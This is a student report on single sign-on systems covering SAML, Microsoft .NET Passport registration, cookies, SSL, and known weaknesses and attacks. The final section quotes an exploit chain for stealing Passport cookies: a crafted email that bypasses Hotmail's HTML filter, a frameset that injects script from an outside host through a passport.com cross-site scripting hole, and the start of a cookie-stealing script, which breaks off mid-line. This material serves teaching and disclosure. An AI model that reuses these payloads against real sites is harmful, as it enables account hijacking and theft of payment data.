microsoft®mdr/teaching/modules04/security/students/… · web viewpassport takes e-mail address...
TRANSCRIPT
Single Sign-on Systems
Group: SS5ID: 667618
658490607349655507
Content1 Introduction...................................................................................................................................32 Single sign-on System...................................................................................................................4
2.1 What is Single sign-on........................................................................................................42.2 How does single sign-on works?........................................................................................42.3 Password synchronization V.S. single sign-on....................................................................5
3.SAML single sign-on.....................................................................................................................73.1 What is SAML....................................................................................................................73.2 How does it works..............................................................................................................73.3 What is SAML composed of...............................................................................................9
4 .NET Passport..............................................................................................................................114.1 Registration Process..........................................................................................................11
4.1.1 Information Stored in a .NET Passport..................................................................124.1.2 Unique Identifiers..................................................................................................124.1.3 Captcha telling human from computers.................................................................134.1.4 E-mail Validation...................................................................................................14
4.2 Authentication Process......................................................................................................144.2.1 Cookies written by Passport...................................................................................154.2.2 Navigate to another Participating Site....................................................................164.2.3 Passport Sign-in and Sign-out................................................................................16
4.3 Secure Sockets Layer (SSL).............................................................................................164.3.1 Public Key Cryptography for Authentication.........................................................174.3.2 Digital Signature s..................................................................................................174.3.3 Certificate Mechanism...........................................................................................184.3.4 Potential attack!.....................................................................................................194.3.5 Message Authentication Code (MAC)...................................................................19
5 MS Passport security weaknesses................................................................................................205.1 Cookies problem...............................................................................................................205.2 Key management..............................................................................................................205.3 Passport server attack........................................................................................................215.4 Hotmail credential assignment..........................................................................................21
6. Attack to the MS Passport...........................................................................................................226.1 Fake merchant attack........................................................................................................226.2 Active attack.....................................................................................................................236.3 DNS attack........................................................................................................................246.4 Cookies Attack..................................................................................................................25
7. Advantages of Passport...............................................................................................................288. Business use (MS Passport)........................................................................................................29
8.1 Business use of Passport...................................................................................................298.2 Business Benefits of Passport...........................................................................................29
9. about the Liberty Alliance...........................................................................................................3010. Conclusion................................................................................................................................31Bibliography...................................................................................................................................32
2
1 IntroductionIt is very common for people to shopping on the web, or has the Internet banking. To concern about the security issue, the online vendors often require a client authentication by a username and a password. However, a problem might occur at his point, which is the multiple username and password for different accounts. Users might have different usernames and passwords, sometimes to remember all of that is very difficult, and it’s not a good solution to write down the username and password due to the security reason.
An ideal solution for above problem is one user only need single username and password to be authenticated by multiple services. Single sign-on is a way to solve this problem. Single sign-on is the term used to represent a system whereby users need only remember one username and password, and authenticated can be provided for multiple services.
In the following report, what is the single sign-on system, how it works will be illustrate in detail. Two example of the single sign-on system ----SAML and Microsoft Passport , will be introduced in this report. In the conclusion the disadvantage and advantage of single sign-on system will be discussed.
3
2 Single sign-on System
2.1 What is Single sign-on
Single sign-on is a mechanism to let “users sign onto a site only once and are given access to one or more applications in a single domain or across multiple domains.” i. It can be illustrated in two different scopes. One is in the client/server relationship; the other is in the e-commerce domain. 1) “In any client/server relationship, single sign-on is a session/user authentication process that
permits a user to enter one name and password in order to access multiple applications. “ ii
When the session is initiated, the single sign-on will be requested, after pass the authentication, it then will authenticates the user to access to all the partner domains, and eliminates future authentication prompts when the user switches applications during that particular session.
2) “In e-commerce, the single sign-on (sometimes referred to as SSO) is designed to centralize consumer financial information on one server - not only for the consumer's convenience, but also to offer increased security by limiting the number of times the consumer enters credit card numbers or other sensitive information used in billing.”iii Microsoft's "Passport" single sign-on service (averaging over 40 million consumers and more than 400 authentications per second) use the wallet protocol to store users’ financial information.
2.2 How does single sign-on works?
When the user requests a resource from the server, the server collects the access-control lists (ACLs) associated with that resource and evaluates them. If the server's evaluation of the ACLs requires identification of the user, the server requests client authentication. The client authentication can be achieved by many different way, one possible solution is to use the Secure Sockets Layer (SSL) protocol, which is the way to transmitting private documents( can be the user information, such as credit card numbers) via the Internet. SSL works by using a private Key to encrypt data that's transferred over the SSL connection. (Microsoft passport using the cookies to store the user information, this will be illustrate in detail in the following report) After the server has established the user's identity, optionally including user/group information stored in a Lightweight Directory Access Protocol (LDAP) directory, it continues its evaluation of the ACLs and authorizes or denies access to the requested information according to the user's access privileges. In the Figure 1, the basic elements of the ACL evaluation process are illustrated.
Figure 1 Single sign-on uses certificate-based authentication
4
It can be seen from figure 1 that in the client authentication part, the SSL certificate replaces the password. The certificate sent over the network with client authentication based on the Secure Sockets Layer (SSL). Therefore, as long as user login once, and obtain the authentication certificate, and other domains’ client authentication will be done by that certificate. Once the certificate is created, other party cannot change that certificate, it will be sent form domain to domain thought a secure channel. The certificate stores the client’s information, the issues time and the validity duration. When the validity duration past, a new client authentication is required.
2.3 Password synchronization V.S. single sign-on
People might think that, as long as use the same password and username for different application, can solve the multi-login problem. Actually a password synchronize software has been develop in order to work out the multi-login problem. However, this solution might not completely achieve the aim.
“The password synchronization is the process of changing each password for different applications to the same value, so that the user always enters the same password. Once you install password synchronization software, users will enter the same password when they login to any of the synchronized systems, such as to their network, finance system, email, calendar or the mainframe.”iv
Although the password synchronization might partly achieve the single sign-on, nevertheless compare to the real Single sign-on mechanism, it is not the perfect solution. The comparison between the password synchronization and the single sign-on is given in the following table.
Comparison of password synchronization with single sign-on
Password synchronize Single sign-on
Process Simply changes all applications to the same
Use single username and password to sign in to one site,
5
password. User continues to login to each of those applications, separately, but uses the same password at each login
the client authentication of other sites will finish by the specific server
Login times Several times depends one the application required
Once for every domains
Manage other credential data Manage passwords only, other credential data such as usernames, IP addresses and database names not manage.
Use specific protocol to manage the client authentication
Weak password Can only match the policy of the weakest system, for example, if an application supports a maximum length of four character passwords only, all applications in the synchronized group can only be protected by a maximum length of four characters.
User don’t need to worry about the password authentication, all the authentication is done by the server and the specific authentication mechanism.
Security Once one application is compromised, all the other applications can be accessed, the sensitive data will be obtained.
Can encrypt to the sensitive data and send it by the SSL save channel
6
3.SAML single sign-on
3.1 What is SAML
“SAML (Security Assertion Markup Language) is an XML framework for exchanging security information over the Internet.”v The security information are user authentication, entitlements and attribute information. Different security services systems can be interoperated to the SAML. The exchange of the identity and entitlement between one service and the others is enabling by residing the security information within a system's security mechanisms.The mechanisms or approaches to authentication or authorization which SAML using are not a new way, however it defines a XML structure of the documents that transport security information between services.
3.2 How does it works
The client authenticationAuthentication is a core part of the single sign-on mechanism. In the SAML, the client authentication is done by an Identity provider. The Identity provider authenticate the user/client, if the authentication is passed, it will send a authentication assertion to proof the client has passed the authentication. When user requests to access the service provider, the service provider will first check the authentication assertion, and sent this assertion to the identity provider to confirm the authenticity of this assertion. The Identity provider then will send back a confirm message to the service provider the assertion is true. As seeing the confirm message, the service provider then will allow client to access to it’s resource. Figure 2 below shows the process of the client authentication.
Figure 2 Client authentication process
1. The service provider received the client request, and it sent the request to Identity provider to do the client authentication.
7
2. Identity provider authenticate the client, create the assertion , and pass it back to the service provider.
In the following, a sample SAML-compliant request is sent from a relying party (service provider) requesting password authentication by the issuing party (Identity provider).
<samlp: Request ...> <samlp: AttributeQuery> <saml: Subject> <saml: NameIdentifier SecurityDomain="sun. com" Name="rimap"/>
</saml: Subject> <saml: AttributeDesignator AttributeName="Employee_ ID" AttributeNamespace="sun. com"> </saml: AttributeDesignator>
</samlp: AttributeQuery> </samlp: Request>
•In response, the issuing authority asserts that the subject (S) was authenticated by means (M) at time (T). <samlp: Response MajorVersion="1" MinorVersion="0" RequestID="128.14.234.20.90123456" InResponseTo="123.45.678.90.12345678" StatusCode="/features/2002/05/Success"> <saml: Assertion MajorVersion="1" MinorVersion="0" AssertionID="123.45.678.90.12345678" Issuer="Sun Microsystems, Inc." IssueInstant="2002- 01- 14T10: 00: 23Z"> <saml: Conditions NotBefore="2002- 01- 14T10: 00: 30Z" NotAfter="2002- 01- 14T10: 15: 00Z" /> <saml: AuthenticationStatement AuthenticationMethod="Password" AuthenticationInstant="2001- 01- 14T10: 00: 20Z"> <saml: Subject> <saml: NameIdentifier SecurityDomain="sun. com" Name="rimap" /> </ saml: Subject> </ saml: AuthenticationStatement> </ saml: Assertion> </ samlp: Response>
Securing Web Services
In order to carry the security and identity information between Identity provider and the service provider, the SAML assertions can be add a SOAP Header blocks. With the SOAP header blocks, the assertions can be used as Security Tokens to do the service transactions. (The Liberty Alliance's ID-Web Service Framework also uses SAML assertions as the base security token format for enabling secure &privacy respecting access to identity-based web services.)
“SOAP stands for Simple Object Access Protocol is a lightweight protocol for the exchange of
8
information in a decentralized, distributed environment. It is an XML-based protocol that consists of three parts: an envelope that defines a framework for describing what is in a message and how to process it, a set of encoding rules for expressing instances of application-defined data types, and a convention for representing remote procedure calls and responses. SOAP can potentially be used in combination with a variety of other protocols; the primary transmission protocol is over HTTP.”vi
3.3 What is SAML composed of
SAML is composed of distinct but interrelated component. The components of the SAML are: vii
Assertions
Request/response protocols
Bindings (the SOAP-over-HTTP method of transporting SAML requests and responses)
Profiles (for embedding and extracting SAML assertions in a framework or protocol)
AssertionsAs illustrate before, the Assertions if made by the Identity provider. It’s a package of information that supplies one or more statements. There are four different type of the assertion statement.
Authentication: The specified subject was authenticated by a particular means at a particular ti me.•Attribute: The specified subject is associated with the supplied attributes.•Authorization Decision: A request to allow the specified subject to access the specified resource has been granted or denied. viii
The outer structure of the assertion is generic, and simple, common elements are build in the assertion. The information it provides are:
Issuer ID and issuance timestamp
Assertion ID
Subject
Name and security domain
Subject's authentication data (optional)
Advice (optional additional information provided by the issuing authority)
Conditions under which the assertion is valid
Assertion validity period (NotBefore and NotOnOrAfter)
Audience restrictions
Target restrictions (intended URLs for the assertion)
Application specific conditions
ProtocolDifferent kinds of protocol are applied to the SAML. These protocols allow the services providers to request and the Identity provider to response. The service providers can:
•Request one or more assertions (includes a direct request of the desired assertions, as well as
9
querying for assertions that meet particular criteria)•Request that a principal be authenticated with the corresponding assertion returned•Request that a name identifier be registered•Request that a federation be terminated•Retrieve a protocol message that has been requested by means of an artifact•Request a near-simultaneous logout of a collection of related sessions (“single logout ”)•Request a name identifier mapping
BindingsMappings from SAML request-response message exchanges into standard messaging or communication protocols are called SAML protocol bindings. ix
ProfilesGenerally, a profile of SAML defines constraints and/or extensions in support of the usage of SAML for a particular application – the goal to enhance interoperability by removing some of the flexibility inevitable in a general usage standard.x
10
4 .NET PassportMicrosoft® .NET Passport is an implementation of Single Sign-On system, based on cookie and employing security technique to prevent attacks. It includes the Passport single sign in service and the Kids Passport service.
Passport service simplifies sign in and registration, allowing easy access without repetitive registrations. Additional, users can store common personal information in Passport profile.
Kids Passport service is the business application of .NET Passport which allows parents to modify profile information of their children.
In this part we call any web site, joining the .NET Passport, participating site.
4.1 Registration Process
Registration process is dealt in passport service. When user registers for a Passport, they are opening a Passport Account with a 64-bit Passport User ID which is shared with participating sites.
Figure 1: The Registration Process. xi
1. In this example the user browses to Site A, a participating site or service (or browses to www.passport.com),
and they click the “Sign In” button (or click the “Register” button on Passport.com).
2. The user is redirected to a co-branded registration page displaying the registration fields that were chosen by
Site A. (The minimum number of fields required is two: email name and password.) Here the user chooses
whether or not they want to opt in to share their information with other Passport-enabled sites that they sign in
to.
3. The user reads and accepts terms of use (or declines, and the process ends), and submits the form. (On
Passport.com the user is shown a congratulations page and sign up process ends here.)
4. The user is then redirected back to Site A with their encrypted authentication ticket and profile information
attached.
5. Site A decrypts the authentication ticket and profile information and continues their registration process, or
11
grants access to their site.
NOTES: Sites B and C do not receive any information about the user. The user does not need to download any
software.
The minimum amount of information user should provide while registering is : e-mail address and password. This password does not match the e-mail password, it is only used to get authentication from Passport service.
4.1.1 Information Stored in a .NET Passport
.Net Passport account can store not only Credential information such as e-mail address and password, but also Profile data which is shared between participating sites and passport service.
Passport takes e-mail address as account. So when registering, e-mail address and password are the necessary information users should provide. For an extra layer of security, most of participating sites normally require an additional security key at sign in. Additional, users could set three secret questions in case of forgetting the security key.
Profile information stores those data users are willing to share. E-mail address is the one that can be both credential and profile information.
Account Information Chart xii
Information Data Type
Required to create a Passport?
Shared with other sites?
E-mail Address (Sign in
name)
Credential
and Profile
Yes If user opts-in
Password Credential Yes Never
Security Key Credential Optional (However a
participating site may require
the use of a Security Key)
Never
Birth Date
Country / Region
First Name
Gender
Last Name
Occupation
Postal Code
Preferred Language
State
Time Zone
Profile Optional, what fields are used
is determined by the site that
registers the user.
If user opts-in
12
4.1.2 Unique Identifiers
When registering successfully, each account is assigned a 64-bit unique identifier, Passport User ID (PUID). This PUID will be sent (encrypted) to participating site as the authentication credential when a Passport user signs in. As it is up to the user whether they want to share their e-mail address and other information, sites cannot depend on this type of information to identify the user.
4.1.3 Captcha telling human from computers
.NET Passport service employs Captcha technology, which asks registers to type in alphanumeric characters from a picture, to telling human from computers.
Figure 2: Telling human from computers.
As attackers can easily submit thousands of fake registrations in a minute by program, it overwhelms the capacity of a registration system and causes service server to go offline.
Captcha stands for “Completely Automated Public Turing Test to Tell Computers and Humans Apart.” xiii
Captcha test was raised in November 1999, when students at Carnegie Mellon and students at MIT wrote voting “bots” programs to win in an online poll asking which the best graduate school in computer science was. Such attacks can also occur in account registration and email sending.Captcha test is based on the human ability to read distorted and corrupted text, and current computer programs can not do the same. Captcha works by choosing a certain number of alphanumeric characters, and then displaying them corrupted and distorted in an image; after that Captcha asks the user to type the characters displayed in that image. While human users have no problem typing the words displayed, current bots are simply unable to do the same.
13
4.1.4 E-mail Validation
In the last step of registration, the email address registered in Passport need to be verified. Passport service sends a welcome e-mail message informing the user about the service. By clicking the appropriate link in the e-mail, user can either validate the account or cancel it. This process can efficiently prevent e-mail addresses from being used in Passport accounts without the permission of the true owner of that e-mail address, which can lead to confusion and inconvenience for both the consumer and the participating site.
4.2 Authentication Process
Passport authentication messages take the form of electronic “tickets”-- cookies, with this ticket users are authorized to access pages in participating sites.
Passport service separates the participating site user interface from the passport service domain. The same as registration process, after clicking the standard Passport sign-in, user will be redirected the sign-in page on Passport.com. Once the user is verified, Passport writes a cookie, called “ticket-granting-cookie”, on the user’s browser. This cookie can be used as electronic “tickets” in subsequent access. Then Passport redirects browsers to the participating site.
Figure 3: The Passport Authentication Process xiv
14
1. User browses to participating site or service (Site A in this example). User clicks “Sign In” button or link.
2. User is redirected to Passport.
3. Passport checks if the user has a “Ticket Granting Cookie” (TGT) in their browser’s cookie file (one that meets
the rules that Site A has set), if one is detected they skip to step 4 and never see the Passport login UI. If the
TGT does not satisfy the time since sign in rule requested by Site A, then Passport removes information that
Site A passed on the query string and redirects the user to a page that asks for the currently signed-in users’
password. This new page has a short URL in the passport.net domain. If the user enters the correct
information, they proceed.
4. The user is redirected back to Site A with their encrypted authentication ticket and profile information attached (if
the user has chosen to share it, and if it is present).
5. Site A decrypts authentication ticket and profile information, and signs the customer into their site.
6. User accesses the page, resource, or service they requested from Site A.
NOTE: That Sites B and C do not receive any information in this process. No information about a user is shared with
Sites B and C unless the user chooses to sign in at those sites.
4.2.1 Cookies written by Passport
Passport uses cookies as electronic ticket that allows users to move from page to page without having to sign in again and again. But we should notice that if the user’s browser does not support cookie, passport service will not work.
Cookies with credentials are encrypted with Passport key and written only to the authority domain, can not be directly accessed by participating site.
Cookie Table xv
Label Common Name
Description / Contents
MSPAuth Ticket Encrypted with the Passport key. Contains the Passport
timestamps (last refresh and last manual sign in), saved-
password flag, key version verification and any flags set by
network servers.
MSPProf Profile Encrypted with the Passport key. Contains each of the core
profile attributes, if they are present and the user has chosen
to share them.
MSPSec Ticket-Granting
Cookie
Sent via HTTPS for all browsers that allow HTTPS cookie
writes. Contains SSL-encoded PUID and password, used for
silent sign in.
MSPVis Participating
sites Cookie
Each new Passport Participant site visited by a user has its
site ID written to this cookie. Used by the Login server to
compile the list of sites that must be signed out from when
the user clicks any Sign Out link. No encryption.
15
Others with profile information are encrypted with participating sites key and written to the domain of participating sites. These cookies enable the user to sign in at any Passport participating sites during a browser session.
Label Common Name
Description / Contents
MSPAuth Ticket Encrypted with participating sites Passport key. Contains the
Passport timestamps (last refresh and last manual sign in),
saved-password flag, key version verification, and other flags.
MSPProf Profile Encrypted with participating sites Passport key. Contains
each of the core profile attributes, if they are present and the
user has chosen to share them.
MSPSecAuth SSL Channel Sent via HTTPS for all browsers that allow HTTPS cookie
writes. Used to indicate the participating site is using the SSL
channel feature.
4.2.2 Navigate to another Participating Site
Literally, passport is an authentication with which people can go anywhere they are authorized. .Net Passport provides an electronic “ticket” (as the form of cookie), within the period of validity, the user can access the site from page to page, even transfer to another participating site without re-entering their credentials. When transferring to another participating site, the user is redirected to Passport server, as the first sign in. But Passport server will check the “ticket-granting-cookie” stored on the browser, if the timestamp in the cookie is fresh enough, the user does not need to re-enter the credential, and the encrypted ticket and profile cookies will be written on the browser.
4.2.3 Passport Sign-in and Sign-out
Visiting each Passport participating site, user will sign in through the co-branding sign-in page (Figure 4). There are two check boxes in this page helping users log on. If the user check the box “I’m using a public computer.”, passport will not automatically enter the e-mail address after the user logs into the computer again. If the box “Sign me in automatically” is checked by the user, passport will type the e-mail address and password for the user automatically. It
16
means user will not always see the Passport sign in page and will be able to freely use participating sites without inputting any information, unless they click the Passport sign out logo. Normally, when a user signs out by clicking the sign out logo, all Passport cookies from all the participating sites during browser session will be deleted from the computer.
4.3 Secure Sockets Layer (SSL)
SSL, short for Secure Sockets Layer, is a protocol developed by Netscape for transmitting private documents via the Internet. SSL works by using a public key to encrypt data that's transferred over the SSL connection. Both Netscape Navigator and Internet Explorer support SSL, and many Web sites use the protocol to obtain confidential user information, or authenticate resisted user. By convention, URLs that require an SSL connection start with https: instead of http:.
4.3.1 Public Key Cryptography for Authentication
Public-key encryption is a cryptographic system that uses two keys -- a public key known to everyone and a private or secret key known only to the recipient of the message. Moreover, it is virtually impossible to deduce the private key if you know the public key.
In authentication process, service sends random message to user. When receiving the message, user responses service with the encrypted received message with his/her public key. Assume user disclose public key to service (discussed in the "Handing Out Public Keys" section). Service decrypts the response message, if it matches the original message, the user passes the authentication, because an imposter presumably would not know user’s private key and so would be unable to properly encrypt the random message.
Figure 5: Public Key Cryptography for Authentication.
In this example, Alice plays the role of service server. Bob is a registered user. And Bob has disclosed public key to
Alice. {Random msg}Bob’s private key means message encrypted with Bob’s private key.
4.3.2 Digital Signature s
No one would like to encrypt unknown message with his private key and send it to others, as you have to hold responsible for the encrypted value To reduce the risk of being attacked, we prefer to
17
Alice -- > Bob Random msgBob -- > Alice {Random msg} Bob’s private key
constructs a un-reversed message digest and send it to the service server. An impersonator has difficulty finding a different message that computes to the same digest value, but the server can compute the same digest and authenticate User by decrypting User's message and comparing the values. Actually, SSL takes the technique mentioned above, which is known as a digital signature. When responding, User generates his own message, constructs a digest from it, and sends the message with its encrypted digest to sever.
Figure 6: Digital Signature.
Bob generates his own message, constructs a digest from it, and sends the message with its encrypted digest to
Alice
Alice -->Bob hello, are you Bob?
Bob-->Alice Alice, This Is Bob {digest [Alice, This Is Bob]}Bob’s private-key
4.3.3 Certificate Mechanism
How can a user hand out a public key in a secure manner? Sending the public key in a physical way is the most secure way. But it seems impossible. SSL employs certificate mechanism
A certificate contains the following information: xvi
•The name of the certificate issuer.•The entity for whom the certificate is being issued (also known as the subject).•The public key of the subject.•Some time stamps.
The certificate is signed by using the private key of the certificate issuer. Certificates are a standard method to bind a public key to a name.Using certificate technology, service server can examine User's certificate to see if the certificate has been forged.
Alice -->Bob hello
Bob-->Alice Hi, I'm Bob, bob’s certificate
Alice-->Bob prove it
Bob-->Alice Alice, This Is Bob { digest[Alice, This Is Bob] } bob’s private-key
After passing authentication, service server will send User a secret key, which will be used as a key to a symmetric cryptographic algorithm.
Alice -->Bob {secret} Bob's public_key
Bob -- > Alice {some message} secret_key
18
4.3.4 Potential attack!
Figure 7: Security Interference
Bob and Alice’s communication maybe observed by attacker Mallory. Mallory is sitting between Alice and Bob,
Mallory can pass most of the information back and forth unchanged, but garble certain messages . Mallory may get
lucky and produce a valid message.
4.3.5 Message Authentication Code (MAC)
To reduce the potential attack, SSL uses a 128-bit MAC. A message authentication code is a piece of data that is computed by using a secret and some transmitted data.
MAC: = digest [some_message, secret]
Alice-->Bob helloBob --> Alice Hi, I'm Bob, bobs-certificateAlice --> Bob prove itBob --> Alice {digest [Alice, This Is Bob] } bobs-private-keyAlice --> Bob ok bob, here is a secret {secret} bobs-public-keyBob--> Alice {some message, MAC} secret-key
Once Mallory attempts to garble messages, the MAC will reveal that the messages do not come from Bob. Alice and Bob can discover the incorrect MAC value and stop communication. SSL provides a secure way to transmit data from server and user, through Certificate, MAC, and Digital Signature technology.
19
Bob-->Mallory {some message}secret-keyMallory-->Alice
Garble [{some message}secret-key ]
5 MS Passport security weaknessesAs e-commerce, users need a tool to help them to manage authentication and personal information. So MS passport is this kind of tool. It is an attempt to meet this need while requiring no changes to existing browsers and servers. However, on the other side, there are some practical risks of MS passport protocol, as follows:
5.1 Cookies problem
Cookies store encrypted credential information of user in the browsers, and the system will not function without cookies. Although passport cookies are proofs of authentication whose lifetimes are determined only by the lifetime of the user’s web browser, passport cookies contains sensitive data. So on a public machine, a user who forgets to log out of a passport account could leave valid authentication behind on the machine for any user to recover.
If user ticks the persistent cookies option, Passport will leave authentication, in form of browser cookies on user’s machine. On one side, as the white paper says “This option keeps a consumer disconnects from the Internet, closes the browser, or turns off the computer.”xvii So the user is not required to retype the Email Address and password. It is very convenient to user. However, on the other side, it may lead to misuse of this option or the cookies may be theft. As the cookies is all that is necessary to impersonate the valid user of that cookie, the theft of the authentication information is undetected, and the attacker can also use user’s passport and Wallet unlimitedly. It could be much more dangerous, if you use this in a public machine.
Another important aspect is that cookies are more social than technological. When you browse some web pages, you may be recorded or spied by Microsoft passport authentication server and your personal information will be exposed. It maybe compromise user privacy, which is a serious problem.
5.2 Key management
In passport protocol, the passport server share triple DES keys with each merchant. These keys should be generated randomly and securely, then transferred in a secure way. It is a good way to transfer the key by physical mail or phone. However, in practical, these keys are transferred by an SSL connection. This is likely to lead to potential breaches.
On top of that, passport use a single key to encrypt all of the cookies and store the information in passport cookies on user’s machines. That will cause a risk of exposure of that key. So it could be a better way to use a master key to generate a unique key. It shows as follows: Using the master key that is used to encrypt cookies, generate a unique key per client by encrypting the client address with the master key, and using the resulting cipher text as the encryption key for that
20
client. Thus, the master key is used only as a key encryption key. If one key is attacked, Passport cookies on the other client are still safe.
5.3 Passport server attack
In traditional web authentication way, each merchant is responsible for the authentication information of customers, but in MS passport single sign on system, passport server, as a central point, sets up a server that stores all the data of users and makes decisions about the authenticity of users. On account of storing all the information in a central location, passport server is an extremely attractive target for attacker.
5.4 Hotmail credential assignment
When users log into Hotmail, they actually run the passport protocol, and the Hotmail server act as a merchant. Unfortunately, Hotmail has been found with a few security problems, so attacker is easy to log into user’s Hotmail account without knowing user’s password. This will cause a serious problem. Attacker will steal the user’s all information, and use user’s account at the other merchants.
For example, Emil Glosserman, Internet security expert, twice attack Microsoft Hotmail and Passport server system. In the first attack, he used 3 lines code to cheat Hotmail filter and succeeded, then he got user’s Passport ID and credit card information. What is more, in the second attack, he only used 1 line code and get the result as above. Fortunately, he had done nothing about user’s account, and reported the security hole to Microsoft.
21
6. Attack to the MS PassportBecause Passport store user’s credentials and wallet information which is so attractive, and it also gets a lot of security weaknesses. It is obvious several times attacked by some people. Here, there are some particular attacks to Microsoft Passport.
6.1 Fake merchant attack
Assuming users have got accustomed to using passport. They trust the server is secure and enjoy the convenience of passport.
We take Bob and Mallory for example, Assuming Mallory (Malicious Party) is bogus merchant and also a attacker. Bob is a passport user.
(1) First, in order to attack Bob’s system, Mallory sets up a phony web store to sell some attractive things.
(2) In addition, Mallory gets a certificate for a web site, called pasport.com. And Mallory sets up his web site with all of the text and image, which would exactly show on a real passport.com customer site.
(3) When Bob visits the phony web site, Bob want to buy something, then click the sign-in, the server creates a redirect to Mallory’s pasport.com. Bob is in the habit of filling his Email Address and Password. So He does not notice the misspelled URL, or check the certificate of this site.
(4) After that, The attacker Mallory has got Bob’s valid authentication information, and he can now go to online shop, use Bob’s wallet service on behalf of Bob.
22
6.2 Active attack
Assuming Bob is passport user and very trust Passport Server, Alice is a trustful merchant, Mallory is a attacker. Assuming Mallory has already accessed to network between Bob and Alice, Mallory could rewrite packets passing between Bob and Alice.
(1)First, Bob sends a request to Alice (merchant), and want to communicate with Alice.
(2)Alice replies to Bob to use a login service at www.passport.com.
(3)Now, the attacker Mallory, waiting between Bob and Alice, interrupts the packet that Alice sends to Bob, and rewrites the URL in the redirection to his fake Pasport.com web site.
(4)Bob visits M’s fake passport web site, filling with the login information. He does not realize the risk because of the same image of passport.com web site existing in Mallory’s web site.
(5)Until now, the attacker has succeeded to attack the system. Then Mallory acts as a proxy between Bob and Alice, and between Bob and Passport Server.
23
There are two reasons why Mallory has succeeded to attack system, one is the redirection from Alice is not protected by SSL protocol. The other is Passport’s use of SSL connections cannot prevent the Mallory from reading and rewriting each packet. So Bob is impossible to notice the proxy(M) on his behalf.
6.3 DNS attack
The security of Passport is heavily decided by the Domain Name System. So the attacker Mallory who controls Bob’s DNS service could simply rewrite passport.com to the IP address of Mallory’s fake pasport.com. The condition is that Mallory firstly obtains a certificate for a domain, call passport.com. Mallory must prove to some legal certificate authority to confirm his use of the domain name. Given the abovementioned quantity of root certification authorities, the existence of one weak to cheat seems likely. The user is in the habit of filling his Email Address and password, so he does not notice the misspelled URL, or check the certificate. Even if he did check the certificate, he might not notice the misspelling. In practice, any URL, even one that does not resemble the word “passport” would probably work as well. And it will get the same result as above.
24
6.4 Cookies Attack
When you are directed to a server in the .passport.com domain, you login to your Passport account, where you authenticate with a user name and password, a variety of cookies are set in the passport.com domain. If you are logging into a site using Passport that is not itself passport.com, you are then redirected back to that site in a manner that sets a variety of cookies in that site's domain.There are two most important cookies:1. MSPSec cookie: it is the cookie that authenticates you to Passport to implement the single sign on feature, i.e., to allow you to be transparently authenticated to other sites that support Passport.2. MSPAuth cookie: This cookie identifies you to the server via the 64-bit Passport Unique ID (PUID) associated with your account, which is set individually for each "participant domain" at login time, in addition to being set in the domain authority's domain. If you select a "keep me logged in" option when you login to Passport, the cookies that are set are permanent cookies. on contrary, they are session cookies that go away when your browser exits.
The Implementation: Passport WalletThe Passport Wallet is a fairly simple application implemented on top of Passport that stores your credit card and contact information. Merchants can support on their site to allow users to use the information in their wallet to automatically fill out the billing and shipping information as a part of "Passport Express Purchase". The Passport Wallet uses the .passport.com cookies to authenticate you, as it resides in the passport.com domain.
You will be taken to a Passport server to select what billing and shipping information to send to the merchant when in the process of checking out at a participating merchant. After submitting the form, Passport redirects your browser back to the merchant with the information you selected. This information is only encrypted using SSL; not using the participating site's key, so a hostile client can stole it easily. As the three reasons following up:
1. User may have entered their password, but not intending to be used to access their Passport Wallet. If someone logs into Hotmail then reads an email sent to them that uses one of a variety of attacks to steal their Passport cookies, that attacker has then effectively stolen that user's Passport Wallet, without the user ever knowing.2. A "manual sign in" doesn't actually require that the user enter their password in some cases. If you use the "my Hotmail inbox" feature of MSN Messenger, which gives you direct access to your Hotmail inbox, behind the scenes that acts just as if you had actually entered your password, MSN Messenger enter it on your behalf.
3. Cross Site Scripting Bugs: The various passport.com web sites have a number of Cross Site Scripting vulnerabilities. All the cookies can be stolen. Because they are set for any server in the .passport.com domain.
25
Examples:Step One: Hotmail HTML Filtering HoleThere have been lots of holes found in Hotmail's HTML filtering in the past. There will continue to be lots found in the future if Microsoft continues down their current flawed path of trying to code in explicit support for blocking every freak case. Obviously, an exploit like this is enough to allow someone else to access your Hotmail account and do nasty things with it. But that isn't the central point here; the only reason I bother to include the Hotmail hole is since it was so quick to come up with a new exploit, and it makes it more obvious that no user interaction is required to steal the contents of the Passport Wallet. This exploit, as with everything else described in this document, is designed to be used against IE, but exploits are possible for whatever browser you want to pick that supports the features required to use Passport in the first place. If you send the following email to a Hotmail account: From: Jennifer Sparks <[email protected]>To: [email protected]: text/htmlSubject: Jack said I should email you...
Hi Ted. Jack said we would really hit it off. Maybe we can get togetherfor drinks sometime. Maybe this friday? Let me know.
<BR><BR><HR>You can see the below for demonstration purposes. In a real exploit, you wouldn't even see it happening.<HR><BR><_img foo="<IFRAME width='80%' height='400' src='http://alive.znep.com/~marcs/passport/grabit.html'></IFRAME>" >Then when the user reads it, it will load a frame with grabit.html in, which can then continue on with Step Two. This doesn't require the execution of any javascript in the Hotmail message, although the hole lets you do that. Obviously, you could make it so the user doesn't see any of this going on. Hotmail thinks the "<_img" is part of the start of a HTML tag, so it treats the characters inside that supposed tag as attributes, etc. However, IE doesn't treat any tag starting with what it considers an invalid character to be a tag at all, so it doesn't treat it as markup at all, and continues on to parse the IFRAME tag. Is IE wrong? You can argue about that. But if Hotmail didn't allow tags it knew nothing about, this wouldn't be a problem. In general, most current browsers have quite complex rules for parsing HTML that can behave in very unexpected ways. Allow what you know to be good and well formed, don't just filter what you think is bad. Remember, if you didn't have this Hotmail hole you could still just send a link and try to social engineer the user to clicking on it. No part of this exploit relies on executing javascript in the Hotmail domain. Step Two: Setup A Couple of Frames
26
In Step One, we get the user's browser to load grabit.html. All grabit.html contains is: <HTML><HEAD><TITLE>Wheeeee</TITLE><frameset rows="200,200"><FRAME NAME="me1" SRC="https://register.passport.com/ppsecure/404please"><FRAME NAME="me2" SRC="https://register.passport.com/reg.srf?ru=https://ww.passport.com/%22%3E%3CSCRIPT%20src='http://alive.znep.com/~marcs/passport/snarf.js'%3Ej%3C/SCRIPT%3E%3Flc%3D1033"></FRAMESET></HTML>This loads two frames. The top frame is under the /ppsecure path to allow us to steal the MSPSec cookie. We don't actually have to do this for this exploit, but I'm throwing this in just to show how trivial it is. The page doesn't exist, but that doesn't change anything. The bottom frame exploits one of the passport.com cross site scripting holes. reg.srf, if you are logged in, ends up loading a page saying you are already logged in that includes the ru parameter without properly encoding it. At that time, snarf.js executes to actually steal the cookies. Step Three: Stealing the CookiesNow snarf.js is being executed in the security context of a page with a URL of http://register.passport.com/alreadysignedin.srf. The contents of snarf.js are quite simple: s = new String(document.URL);if (s.indexOf('http:') == 0) {
setTimeout('document.location="https:" + s.substring(5, s.length-1, 1000)');} else {
